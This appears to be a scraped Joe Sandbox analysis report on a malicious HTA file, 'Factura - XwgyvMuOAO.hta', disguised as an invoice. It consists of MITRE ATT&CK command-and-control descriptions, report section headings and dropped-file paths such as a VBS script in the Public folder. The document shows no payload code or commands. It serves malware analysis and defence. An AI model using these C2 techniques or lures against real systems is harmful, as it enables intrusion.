Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Factura - XwgyvMuOAO.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\uoxx0.vbs

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\g1[1].txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\g1[1].htm

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: mshta.exePID: 3788, Parent PID: 5456

General

Chronological Activities

Windows Analysis Report
Factura - XwgyvMuOAO.hta